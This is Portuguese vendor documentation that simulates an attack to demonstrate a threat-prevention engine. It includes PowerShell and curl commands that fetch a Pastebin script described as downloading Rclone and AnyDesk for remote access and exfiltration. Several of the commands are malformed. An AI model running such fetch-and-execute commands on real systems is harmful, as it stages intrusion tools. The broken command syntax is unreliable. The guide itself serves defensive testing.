Visão geral
A Prevenção de Ameaças Agentic é um motor de segurança que aplica controles dinâmicos proativamente em resposta a ameaças detectadas para reduzir a superfície de ataque e mitigar as ameaças cedo, antes que qualquer impacto ocorra. Para mais informações, consulte O que é Prevenção de Ameaças Agentic?
Este artigo simula um cenário de ataque real para demonstrar como a Prevenção de Ameaças Agentic protege sua rede. Embora esta não seja uma ameaça agentic, demonstra como os controles são aplicados para evitar que técnicas semelhantes sejam usadas em um ataque agentic.
Neste exemplo, um usuário baixa um script do Pastebin que um atacante usa para tentar recuperar ferramentas adicionais de alto risco necessárias para realizar um ataque futuro. A Prevenção de Ameaças Agentic identifica o comportamento malicioso e bloqueia a ferramenta de ser baixada, impedindo o ataque antes que possa progredir ou qualquer impacto ocorra.
A resposta a este ataque é totalmente automatizada. Nenhuma regra adicional é obrigatória. Simplesmente ativar a Prevenção de Ameaças Agentic é suficiente para impedir o ataque.
Para simular este ataque:
Baixar uma ferramenta de alto risco sem ser bloqueado
Baixar o script do Pastebin
Tentar baixar as ferramentas de alto risco novamente. Desta vez, o download é bloqueado.
Nota: Embora este cenário não seja agente, ilustra como os controles podem ajudar a impedir que técnicas semelhantes sejam usadas em ataques agentes.
Prerequisites
A Prevenção de Ameaças Agentic está ativada com ações definidas para Bloquear
Etapa 1: Download de uma Ferramenta de Alto-Risco
Para demonstrar que a Prevenção de Ameaças Agentic bloqueia ações apenas quando fazem parte de uma sequência maliciosa, primeiro baixe o Rclone, uma ferramenta de linha de comando open-source para gerenciar arquivos. Os atacantes costumam usar o Rclone como uma ferramenta pós-comprometimento porque é legítimo, poderoso, e se mistura com a atividade administrativa normal.
Ação
Baixar Rclone de qualquer um dos seguintes:
O seguinte URL:
https://downloads.rclone.org/rclone-current-windows-amd64.zipEm dispositivos Windows:
O seguinte comando PowerShell:
Start-Process "https:\/\/downloads.rclone.org\/rclone-current-windows-amd64.zip" -Label "RClone"<\/code>
Em dispositivos macOS/Linux:
O seguinte comando Terminal:
curl -sSL "https://downloads.rclone.org/rclone-current-windows-amd64.zip"
Resultado
O arquivo é baixado com sucesso.
Explicação
Isso confirma que, em isolamento, a ação não é bloqueada, pois não é considerada maliciosa quando não é precedida por atividade suspeita.
Etapa 2: Download de um Script de Pastebin
Para simular o início de um ataque, baixe um script do Pastebin que, ao ser executado, baixa ferramentas comuns de atacantes, por exemplo, Rclone e AnyDesk para acesso remoto e exfiltração.
Ação
Baixar e executar o script do Pastebin:
Em dispositivos Windows:
O seguinte comando PowerShell:
(New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/C5VxKUpE')
Em dispositivos macOS/Linux:
O seguinte comando Terminal:
curl -sSL "https://pastebin.com/raw/tXhVK2V7"
Resultado
O script é executado e baixa as ferramentas. Um controle dinâmico é aplicado ao host, que é mostrado na página de Ameaças Agentic. Para mais informações, consulte Monitoramento da Prevenção de Ameaças Agentic
Explicação
A Prevenção de Ameaças Agentic detecta indicadores de comportamento suspeito e aplica controles proativamente para bloquear ações maliciosas subsequentes, interrompendo o ataque antes que qualquer impacto ocorra.
Etapa 3: Download de uma Ferramenta de Alto-Risco
No ataque simulado, o atacante tenta baixar o Rclone. No entanto, porque esta ação segue a atividade suspeita de baixar o script do Pastebin e um controle é aplicado, a Prevenção de Ameaças Agentic bloqueia o download do Rclone.
Ação
Baixe o Rclone usando qualquer uma destas opções:
Diretamente do site do Rclone:
https://downloads.rclone.org/rclone-current-windows-amd64.zipEste comando PowerShell (no Windows):
Start-Process -Url "https:\/\/downloads.rclone.org\/rclone-current-windows-amd64.zip" -Label "RClone"<\/code>Este comando do Terminal (ligado macOS/Linux):
curl -sSL \"https://downloads.rclone.org/rclone-current-windows-amd64.zip\"
Resultado
O download deste arquivo é bloqueado pelo controle. A ameaça mitigada é mostrada na página de Ameaças Agentic.
Explicação
Ao contrário do Passo 1, onde este script foi executado isoladamente e, portanto, permitido, o download deste script agora foi precedido por uma ação suspeita e é bloqueado pela Prevenção de Ameaças Agentic.
Demonstração
Este vídeo mostra uma demonstração deste ataque simulado: